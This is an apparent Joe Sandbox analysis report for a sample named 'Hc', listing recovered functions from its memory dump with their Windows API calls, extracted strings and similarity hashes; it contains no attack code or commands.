                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                  • String ID:
                                                                  • API String ID: 895679908-0
                                                                  • Opcode ID: 337ea3b68fd06c565e17fb85b15621d6d42b6749dbd1a9190605fa39605de5e2
                                                                  • Instruction ID: f56a7e39fab42b98488b1399af15daebecf52a7bc65d0b77d72e3796431fb0d7
                                                                  • Opcode Fuzzy Hash: 337ea3b68fd06c565e17fb85b15621d6d42b6749dbd1a9190605fa39605de5e2
                                                                  • Instruction Fuzzy Hash: 2A718171900705AFDB20EFA8CE45BAEBBF6FF48704F104628F586A66A0D775E944CB50
                                                                  APIs
                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 006A0884
                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 006A088F
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 006A089A
                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 006A08A5
                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 006A08B0
                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 006A08BB
                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 006A08C6
                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 006A08D1
                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 006A08DC
                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 006A08E7
                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 006A08F2
                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 006A08FD
                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 006A0908
                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 006A0913
                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 006A091E
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 006A0929
                                                                  • GetCursorInfo.USER32(?), ref: 006A0939
                                                                  • GetLastError.KERNEL32 ref: 006A097B
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                                  • String ID:
                                                                  • API String ID: 3215588206-0
                                                                  • Opcode ID: c25a4000625d0d32fa17721244c87e236435197a972f3df5da3655f9f95066d4
                                                                  • Instruction ID: 5bb2467c2177235f2bb9f4999bc2560a2e1c3d6325dd305f54fb20997dd52542
                                                                  • Opcode Fuzzy Hash: c25a4000625d0d32fa17721244c87e236435197a972f3df5da3655f9f95066d4
                                                                  • Instruction Fuzzy Hash: 754154B0D483196EDB109FBA8C8985EBFE9FF04754B50452AE11CEB291DB789801CF91
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$kn
                                                                  • API String ID: 176396367-2507288018
                                                                  • Opcode ID: ef04d6b3486af10306d4de52f8260c778a1150079415b79a098b2b192f670d6d
                                                                  • Instruction ID: cbd38a2d093a356eaf88b019f7cd2eaa46d942618d583ead14b0519a6fb2f46a
                                                                  • Opcode Fuzzy Hash: ef04d6b3486af10306d4de52f8260c778a1150079415b79a098b2b192f670d6d
                                                                  • Instruction Fuzzy Hash: 21E1D331E006369BCB24AF74C8516EDFBB7BF54B50F14421AE456E7350DB30AE558B90
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • DragQueryPoint.SHELL32(?,?), ref: 006B9BA3
                                                                    • Part of subcall function 006B80AE: ClientToScreen.USER32(?,?), ref: 006B80D4
                                                                    • Part of subcall function 006B80AE: GetWindowRect.USER32(?,?), ref: 006B814A
                                                                    • Part of subcall function 006B80AE: PtInRect.USER32(?,?,?), ref: 006B815A
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 006B9C0C
                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006B9C17
                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006B9C3A
                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 006B9C81
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 006B9C9A
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 006B9CB1
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 006B9CD3
                                                                  • DragFinish.SHELL32(?), ref: 006B9CDA
                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 006B9DCD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$(o$(o
                                                                  • API String ID: 221274066-869869807
                                                                  • Opcode ID: 900e23ebb7807d3ad5de1b267d43fcc871eac2a75bcb46fa7fc7fee9a98a5215
                                                                  • Instruction ID: c442fb68168ba8e07a2f383879cd1ab2a180c369dfc07fc704f238159a94840d
                                                                  • Opcode Fuzzy Hash: 900e23ebb7807d3ad5de1b267d43fcc871eac2a75bcb46fa7fc7fee9a98a5215
                                                                  • Instruction Fuzzy Hash: 1C616AB1108301AFC705EF54DC85DABBBEAEF88750F000A2DF691972A1DB709A49CF56
                                                                  APIs
                                                                  • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00640436
                                                                    • Part of subcall function 0064045D: InitializeCriticalSectionAndSpinCount.KERNEL32(006F170C,00000FA0,3A44EFDA,?,?,?,?,00662733,000000FF), ref: 0064048C
                                                                    • Part of subcall function 0064045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00662733,000000FF), ref: 00640497
                                                                    • Part of subcall function 0064045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00662733,000000FF), ref: 006404A8
                                                                    • Part of subcall function 0064045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 006404BE
                                                                    • Part of subcall function 0064045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 006404CC
                                                                    • Part of subcall function 0064045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 006404DA
                                                                    • Part of subcall function 0064045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00640505
                                                                    • Part of subcall function 0064045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00640510
                                                                  • ___scrt_fastfail.LIBCMT ref: 00640457
                                                                    • Part of subcall function 00640413: __onexit.LIBCMT ref: 00640419
                                                                  Strings
                                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00640492
                                                                  • InitializeConditionVariable, xrefs: 006404B8
                                                                  • WakeAllConditionVariable, xrefs: 006404D2
                                                                  • SleepConditionVariableCS, xrefs: 006404C4
                                                                  • kernel32.dll, xrefs: 006404A3
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                  • API String ID: 66158676-1714406822
                                                                  • Opcode ID: 8f09aef015ccdb204de0f3f1c96efe77a82661d74f143ec66f81f7521b626dca
                                                                  • Instruction ID: 8aaea7015068ce89b7dd4b766811c804251913ea3dd8d572e880c5322edb003f
                                                                  • Opcode Fuzzy Hash: 8f09aef015ccdb204de0f3f1c96efe77a82661d74f143ec66f81f7521b626dca
                                                                  • Instruction Fuzzy Hash: 2E21F972A40725EBF7142BA4AC46FB937DBEF05BA1F011229FB059B380EF709C408A54
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(00000000,00000000,006BDCD0), ref: 00694F6C
                                                                  • _wcslen.LIBCMT ref: 00694F80
                                                                  • _wcslen.LIBCMT ref: 00694FDE
                                                                  • _wcslen.LIBCMT ref: 00695039
                                                                  • _wcslen.LIBCMT ref: 00695084
                                                                  • _wcslen.LIBCMT ref: 006950EC
                                                                    • Part of subcall function 0063FD52: _wcslen.LIBCMT ref: 0063FD5D
                                                                  • GetDriveTypeW.KERNEL32(?,006E7C10,00000061), ref: 00695188
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$BuffCharDriveLowerType
                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                  • API String ID: 2055661098-1000479233
                                                                  • Opcode ID: b1d69fec5797b613c4ac84113adf869ac4d344d36fae53c06086d522c518413d
                                                                  • Instruction ID: 310e9c6bd09cb7fdd8d57c7a067f2c4ce962fd8ee21e30b526a1e1da0d8eff2e
                                                                  • Opcode Fuzzy Hash: b1d69fec5797b613c4ac84113adf869ac4d344d36fae53c06086d522c518413d
                                                                  • Instruction Fuzzy Hash: 9BB104316087029FCB10EF28D891AAAB7EBBF94724F10491DF496C7791DB30D885CB92
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 006ABBF8
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006ABC10
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006ABC34
                                                                  • _wcslen.LIBCMT ref: 006ABC60
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006ABC74
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006ABC96
                                                                  • _wcslen.LIBCMT ref: 006ABD92
                                                                    • Part of subcall function 00690F4E: GetStdHandle.KERNEL32(000000F6), ref: 00690F6D
                                                                  • _wcslen.LIBCMT ref: 006ABDAB
                                                                  • _wcslen.LIBCMT ref: 006ABDC6
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006ABE16
                                                                  • GetLastError.KERNEL32(00000000), ref: 006ABE67
                                                                  • CloseHandle.KERNEL32(?), ref: 006ABE99
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006ABEAA
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006ABEBC
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006ABECE
                                                                  • CloseHandle.KERNEL32(?), ref: 006ABF43
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 2178637699-0
                                                                  • Opcode ID: 2df2efee9d20ace2b584c0f52460ad69626fdb5e4f216f79e0219dbfb248d48f
                                                                  • Instruction ID: b6d4259ba05ca1b33baf86a013825ba890ff4157d1af0cab226b1bf6aa3ebda0
                                                                  • Opcode Fuzzy Hash: 2df2efee9d20ace2b584c0f52460ad69626fdb5e4f216f79e0219dbfb248d48f
                                                                  • Instruction Fuzzy Hash: 16F19D716043509FC754EF24C891BAABBE6AF86310F18855DF8868B2A2DB31EC45CF56
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,006BDCD0), ref: 006A4B18
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 006A4B2A
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,006BDCD0), ref: 006A4B4F
                                                                  • FreeLibrary.KERNEL32(00000000,?,006BDCD0), ref: 006A4B9B
                                                                  • StringFromGUID2.OLE32(?,?,00000028,?,006BDCD0), ref: 006A4C05
                                                                  • SysFreeString.OLEAUT32(00000009), ref: 006A4CBF
                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006A4D25
                                                                  • SysFreeString.OLEAUT32(?), ref: 006A4D4F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                  • API String ID: 354098117-199464113
                                                                  • Opcode ID: cff990457cafa47acd72a52eb54149630b3a2d1d7dcb29a07c43b3de150ec3ed
                                                                  • Instruction ID: 0f78649457bad89351ddfab64e9dc94ade715608e8a0f73b02143d3359d3fdf3
                                                                  • Opcode Fuzzy Hash: cff990457cafa47acd72a52eb54149630b3a2d1d7dcb29a07c43b3de150ec3ed
                                                                  • Instruction Fuzzy Hash: 0F120A71A00115EFDB14EF54C884EAAB7B6FF86314F148098F9199B251DBB1ED46CFA0
                                                                  APIs
                                                                  • GetMenuItemCount.USER32(006F29C0), ref: 00663F72
                                                                  • GetMenuItemCount.USER32(006F29C0), ref: 00664022
                                                                  • GetCursorPos.USER32(?), ref: 00664066
                                                                  • SetForegroundWindow.USER32(00000000), ref: 0066406F
                                                                  • TrackPopupMenuEx.USER32(006F29C0,00000000,?,00000000,00000000,00000000), ref: 00664082
                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0066408E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                  • String ID: 0
                                                                  • API String ID: 36266755-4108050209
                                                                  • Opcode ID: de2cec3dd285ae7e836ce4eebc554d9d9135922530b01f879a9f25b41df6cfd7
                                                                  • Instruction ID: c3de9e2699e2d9ee5d24571a6cc977f7329b9286df22723c681504c5818160a4
                                                                  • Opcode Fuzzy Hash: de2cec3dd285ae7e836ce4eebc554d9d9135922530b01f879a9f25b41df6cfd7
                                                                  • Instruction Fuzzy Hash: FD710671644226BFEB219F29DC49FEABFA6FF04364F100216F6146A3D1C7B5A950CB50
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,?), ref: 006B7823
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 006B7897
                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 006B78B9
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006B78CC
                                                                  • DestroyWindow.USER32(?), ref: 006B78ED
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00620000,00000000), ref: 006B791C
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006B7935
                                                                  • GetDesktopWindow.USER32 ref: 006B794E
                                                                  • GetWindowRect.USER32(00000000), ref: 006B7955
                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006B796D
                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 006B7985
                                                                    • Part of subcall function 00622234: GetWindowLongW.USER32(?,000000EB), ref: 00622242
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                  • String ID: 0$tooltips_class32
                                                                  • API String ID: 2429346358-3619404913
                                                                  • Opcode ID: 7add732a78c8885bcba6cf578c014589b3e2d5c4bc1c221866fbd3e71c03c8f7
                                                                  • Instruction ID: 60351f87b1e77dddfc047f7581ebbe49eabb0285fd3eb64270b38e8e97325771
                                                                  • Opcode Fuzzy Hash: 7add732a78c8885bcba6cf578c014589b3e2d5c4bc1c221866fbd3e71c03c8f7
                                                                  • Instruction Fuzzy Hash: 68718AB0104245AFD725DF18CC48FAABBEAFBC9300F04456DF9958B2A1DB70A986CF11
                                                                  APIs
                                                                    • Part of subcall function 00621802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00621488,?,00000000,?,?,?,?,0062145A,00000000,?), ref: 00621865
                                                                  • DestroyWindow.USER32(?), ref: 00621521
                                                                  • KillTimer.USER32(00000000,?,?,?,?,0062145A,00000000,?), ref: 006215BB
                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 006629B4
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0062145A,00000000,?), ref: 006629E2
                                                                  • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0062145A,00000000,?), ref: 006629F9
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0062145A,00000000), ref: 00662A15
                                                                  • DeleteObject.GDI32(00000000), ref: 00662A27
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                  • String ID: <)o
                                                                  • API String ID: 641708696-1266362052
                                                                  • Opcode ID: 8c1bba747419546a6dd857a2cbb7e1eda97655215a1f8f4da5a10f3a3a016f2a
                                                                  • Instruction ID: 870b699ff375b9cabefb2f4613a2108d1aa60c00887ed4e47a119378f45480ef
                                                                  • Opcode Fuzzy Hash: 8c1bba747419546a6dd857a2cbb7e1eda97655215a1f8f4da5a10f3a3a016f2a
                                                                  • Instruction Fuzzy Hash: A7618B70509B22DFDB359F15E968B7977F3FB92322F10A118E4429B660C7B1A881CF85
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0069CEF5
                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0069CF08
                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0069CF1C
                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0069CF35
                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0069CF78
                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0069CF8E
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0069CF99
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0069CFC9
                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0069D021
                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0069D035
                                                                  • InternetCloseHandle.WININET(00000000), ref: 0069D040
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                  • String ID:
                                                                  • API String ID: 3800310941-3916222277
                                                                  • Opcode ID: 3478778643e36843664bbbe4a0c7828c9f22d4565e65dc4debafb694f15d4962
                                                                  • Instruction ID: 9345011556356f7ec12ed4af7b0958b957fd750b2446ad29bb8784f9e2a05786
                                                                  • Opcode Fuzzy Hash: 3478778643e36843664bbbe4a0c7828c9f22d4565e65dc4debafb694f15d4962
                                                                  • Instruction Fuzzy Hash: 43517FB1500604BFDB219F60CC88AEB7BFEFF09794F00452AF94596651E734D945EB60
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,006B66D6,?,?), ref: 006B8FEE
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,006B66D6,?,?,00000000,?), ref: 006B8FFE
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,006B66D6,?,?,00000000,?), ref: 006B9009
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,006B66D6,?,?,00000000,?), ref: 006B9016
                                                                  • GlobalLock.KERNEL32(00000000), ref: 006B9024
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,006B66D6,?,?,00000000,?), ref: 006B9033
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 006B903C
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,006B66D6,?,?,00000000,?), ref: 006B9043
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,006B66D6,?,?,00000000,?), ref: 006B9054
                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,006C0C04,?), ref: 006B906D
                                                                  • GlobalFree.KERNEL32(00000000), ref: 006B907D
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 006B909D
                                                                  • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 006B90CD
                                                                  • DeleteObject.GDI32(00000000), ref: 006B90F5
